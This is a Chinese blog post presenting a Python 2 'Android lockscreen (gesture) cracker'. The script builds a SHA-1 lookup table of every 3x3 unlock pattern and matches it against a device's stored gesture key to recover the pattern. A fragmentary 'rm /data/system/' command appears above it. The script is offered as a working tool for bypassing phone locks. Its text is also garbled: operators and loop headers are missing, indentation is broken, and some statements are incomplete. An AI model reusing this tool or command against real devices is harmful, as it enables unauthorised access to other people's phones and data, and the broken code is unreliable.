Andoid 图形屏幕锁破解

2023-02-23 15:20:24 浏览数 (1)




rm /data/system/


#"[*]Android lockscreen(gesture) cracker"
#"[*]Updated by obaby QQ:289090351"
#"[*]Mars Information Security"
#"[*]coding by g0t3n update by obaby

import sys
import os
import hashlib
import struct
import binascii
from copy import deepcopy

filehandle = None
db = "./hash.db"
init_mapper = [[0,0,0],[0,0,0],[0,0,0]]
mapper_queue = []		# tmp_mapper,startx,starty,prev_path
key_mapper  = [['x00','x01','x02'],['x03','x04','x05'],['x06','x07','x08']]

def notfull(mapper):
	for x in range(3):
		for y in range(3):
			if (mapper[x][y] != 0):
				return True
	return False

# 因为必须两个以上九个以下
def canwritelog(mapper):
	cnt = 0
	for x in range(3):
		for y in range(3):
			if mapper[x][y] == 1:
				cnt  = 1
			if cnt > 2:
				return True
	return False

def writelog(tmp, prev):
	strings = ""
	paths = ""
	for i in prev:
		x,y = i
		paths = paths   str(x) str(y)
		strings = strings   key_mapper[x][y]
	#print "writelog: strings => " strings   " | "  hashlib.sha1(strings).hexdigest()
	filehandle.write(paths " | " hashlib.sha1(strings).hexdigest() 'n')

def generatehashtable():
	print "[*]Generate hash.db .........n[*]Waiting..............."
	rounds = 1
	for startxs in range(3):
		for startys in range(3):
			# start point to 0,0
			#startx,starty = 0,0
			cur_mapper = init_mapper
			init = 0
			prev_path = []
			startx,starty = startxs,startys

				if init == 0:			# init
					tmp_mapper = deepcopy(cur_mapper)			# u r not virgin
					tmp_mapper[startx][starty] = 1
					init = 1
					if len(mapper_queue) == 0:		# 队列为空证明finish了
					tmp_mapper,startx,starty,prev_path = mapper_queue.pop()
				#print "head => " repr(tmp_mapper)
				#print "mapper_queue =>" repr(mapper_queue)
				if (startx 1 < 3) :			# right
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 1,starty))
					if  (tmp_mapper[startx 1][starty] != 1):			#  如果该点本来为 1,即结束,即不再入栈
						tmp[startx 1][starty] = 1
						mapper_queue.append((tmp, startx 1, starty, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (startx-1 >= 0):		# left
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					if (tmp_mapper[startx-1][starty] != 1):
						tmp[startx-1][starty] = 1
						mapper_queue.append((tmp, startx-1, starty, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (starty 1 < 3) :		# down
					tmp = deepcopy(tmp_mapper)

					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx,starty 1))
					if (tmp_mapper[startx][starty 1] != 1):
						tmp[startx][starty 1] = 1
						mapper_queue.append((tmp, startx, starty 1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (starty-1 >= 0):		# up
					tmp = deepcopy(tmp_mapper)

					tmp_prev_path = deepcopy(prev_path)
					if (tmp_mapper[startx][starty-1] != 1):
						tmp[startx][starty-1] = 1
						mapper_queue.append((tmp, startx, starty-1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				# 斜 一位
				if (startx 1 < 3) and (starty 1 < 3):		# right down
					tmp = deepcopy(tmp_mapper)

					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 1,starty 1))
					if  (tmp_mapper[startx 1][starty 1] != 1):
						tmp[startx 1][starty 1] = 1
						mapper_queue.append((tmp, startx 1, starty 1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx-1 >= 0) and (starty 1 < 3):		# left down
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx-1,starty 1))
					if (tmp_mapper[startx-1][starty 1] != 1):
						tmp[startx-1][starty 1] = 1
						mapper_queue.append((tmp, startx-1, starty 1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (startx-1 >= 0) and (starty-1 >= 0) :		# left up
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					if (tmp_mapper[startx-1][starty-1] != 1):
						tmp[startx-1][starty-1] = 1
						mapper_queue.append((tmp, startx-1, starty-1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (startx 1 < 3) and (starty-1 >= 0):		# right up
					tmp = deepcopy(tmp_mapper)

					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 1,starty-1))
					if (tmp_mapper[startx 1][starty-1] != 1):
						tmp[startx 1][starty-1] = 1
						mapper_queue.append((tmp, startx 1, starty-1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				#  斜 两位
				if (startx 1 < 3) and (starty 2 < 3):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 1,starty 2))
					if (tmp_mapper[startx 1][starty 2] != 1):
						tmp[startx 1][starty 2] = 1
						mapper_queue.append((tmp, startx 1, starty 2, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx-1 >= 0) and (starty 2 < 3):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx-1,starty 2))
					if (tmp_mapper[startx-1][starty 2] != 1):
						tmp[startx-1][starty 2] = 1
						mapper_queue.append((tmp, startx-1, starty 2, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx 1 < 3) and (starty-2 >= 0):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 1,starty-2))
					if (tmp_mapper[startx 1][starty-2] != 1):
						tmp[startx 1][starty-2] = 1
						mapper_queue.append((tmp, startx 1, starty-2, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx-1 >= 0) and (starty-2 >= 0):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					if (tmp_mapper[startx-1][starty-2] != 1):
						tmp[startx-1][starty-2] = 1
						mapper_queue.append((tmp, startx-1, starty-2, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!

				if (startx 2 < 3) and (starty 1 < 3):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 2,starty 1))
					if (tmp_mapper[startx 2][starty 1] != 1):
						tmp[startx 2][starty 1] = 1
						mapper_queue.append((tmp, startx 2, starty 1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx 2 < 3) and (starty-1 >= 0):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx 2,starty-1))
					if (tmp_mapper[startx 2][starty-1] != 1):
						tmp[startx 2][starty-1] = 1
						mapper_queue.append((tmp, startx 2, starty-1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!
				if (startx-2 >= 0) and (starty-1 >= 0):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					if (tmp_mapper[startx-2][starty-1] != 1):
						tmp[startx-2][starty-1] = 1
						mapper_queue.append((tmp, startx-2, starty-1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!				
				if (startx-2 >= 0) and (starty 1 < 3):
					tmp = deepcopy(tmp_mapper)
					tmp_prev_path = deepcopy(prev_path)
					tmp_prev_path.append((startx-2,starty 1))
					if (tmp_mapper[startx-2][starty 1] != 1):
						tmp[startx-2][starty 1] = 1
						mapper_queue.append((tmp, startx-2, starty 1, tmp_prev_path))
					if canwritelog(tmp):
						writelog(tmp, tmp_prev_path)			# !!!				
				#print "round " str(rounds)
				rounds  = 1

	print "finished..."
def cur_file_dir():
        path = sys.path[0]
        if os.path.isdir(path):
                return path
        elif os.path.isfile(path):
                return os.path.dirname(path)
def printkeytable():
        print "[*]Fallow the map below to enter the device:"
        print "[*]===================="
        print "[*]=00 01 02  |  o o o="
        print "[*]=10 11 12  |  o o o="
        print "[*]=20 21 22  |  o o o="
        print "[*]===================="

def decrypthash():
        print "[*]Hash database detected."
        #print cur_file_dir()   '\'   sys.argv[1]
	if (len(sys.argv)<2) :
                print "[*]Please run the script file with key file name ."
                if os.path.isfile(cur_file_dir()   '\'   sys.argv[1]):
                        print "[*]Get key information now......"
                        keyhandle = open(cur_file_dir()   '\'   sys.argv[1],'rb')
                        gesturebytes =
                        gesturetext = binascii.b2a_hex(gesturebytes)
                        print "[*]Crypted hash is :n  "   gesturetext
                        print "[*]Decoding now....................."
                        filehandle = open(db,'r')
                        for line in filehandle:
                                if not line.find(gesturetext)==-1:
                                        print "[*]Sucess cracked the gesture:"
                                        print line
                                        print "============================================="

if __name__ == '__main__':

        print "============================================="
        print "[*]Android lockscreen(gesture) cracker"
        print "[*]Updated by obaby QQ:289090351"
        print "[*]Mars Information Security"
        print "[*]"
        print "[*]Thx tog0t3n for his/her orginal script"
        print "============================================="
        print "[*]Detect if hash database is exists....."

	if os.path.isfile(db) == False:
		filehandle = open(db,'w')


* 网站名称:obaby@mars

* 网址:

* 本文标题: 《Andoid 图形屏幕锁破解》

* 本文链接:图形屏幕锁破解/

* 转载文章请标明文章来源,原文标题以及原文链接。请遵从 《署名-非商业性使用-相同方式共享 2.5 中国大陆 (CC BY-NC-SA 2.5 CN) 》许可协议。



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